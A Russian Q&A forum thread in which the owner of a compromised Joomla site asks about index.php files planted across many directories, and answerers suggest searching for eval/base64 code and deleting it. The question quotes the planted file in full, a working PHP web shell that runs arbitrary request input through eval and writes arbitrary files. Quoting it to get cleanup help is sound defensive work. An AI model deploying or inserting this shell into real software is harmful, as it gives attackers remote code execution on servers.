# Могут ли плагины Joomla создавать фалы index.php

Tags: joomla, php

Недавно мой хостер прикрыл сайт из-за того, что тот постил спам. В процессе разбирательства выяснили, что была использована уязвимость в `mailto` копмоненте. FTP также не осталось без внимания. 
Но самое интересно, это что в корне сайта во многих каталогах были найдены скрипты `index.php` следующего содержания

```
<?php                                                                                   $jmnqvz = "5f1d01bf28943092be8694a6d6ed8a8e"; if(isset($_REQUEST['qxqxpq'])) { $qsgh = $_REQUEST['qxqxpq']; eval($qsgh); exit(); } if(isset($_REQUEST['ruwsb'])) { $kdeiks = $_REQUEST['tgimzvdw']; $blcecu = $_REQUEST['ruwsb']; $jccezu = fopen($blcecu, 'w'); $lfiqn = fwrite($jccezu, $kdeiks); fclose($jccezu); echo $lfiqn; exit(); }?>
```

Пожалуйста, подскажите, что это за скрипты кем они могут создаваться и как с ними бороться. Заранее спасибо.

Answer (score 0, accepted):

Я искал по файлам на локальном и удалял такое везде. В принципе оно так и удаляется.

Поищите евал по всем файлам и все вот такое убивайте.

Answer (score 0):

В joomla 1.5 источник заражения обычно селился в директории image (или images, в корне , просто не помню точно название,от joomla отказался) он там явно выделялся форматом. Есть такая программа text replace, ее можно установить себе на комп или индексный файл в корень сайта, и соответственно или  качать все файлы себе на комп (отключая антивирус) или вызывая файл из корня прямо на сайте заменять все начинающееся на eval base 64 на ничего. У меня были заражены все файлы .php . Но должен сказать , что это все на несколько дней, ну на неделю от силы. Потом все заново.

Answer (score 0):

Уважаемый, судя по всему вам залили шелл, и обычно не один. Почитайте тут: [Ищем и лечим web shell на взломанном сайте](http://wiki.linux.ru/wiki/index.php/%D0%98%D1%89%D0%B5%D0%BC_%D0%B8_%D0%BB%D0%B5%D1%87%D0%B8%D0%BC_web_shell_%D0%BD%D0%B0_%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BD%D0%BD%D0%BE%D0%BC_%D1%81%D0%B0%D0%B9%D1%82%D0%B5)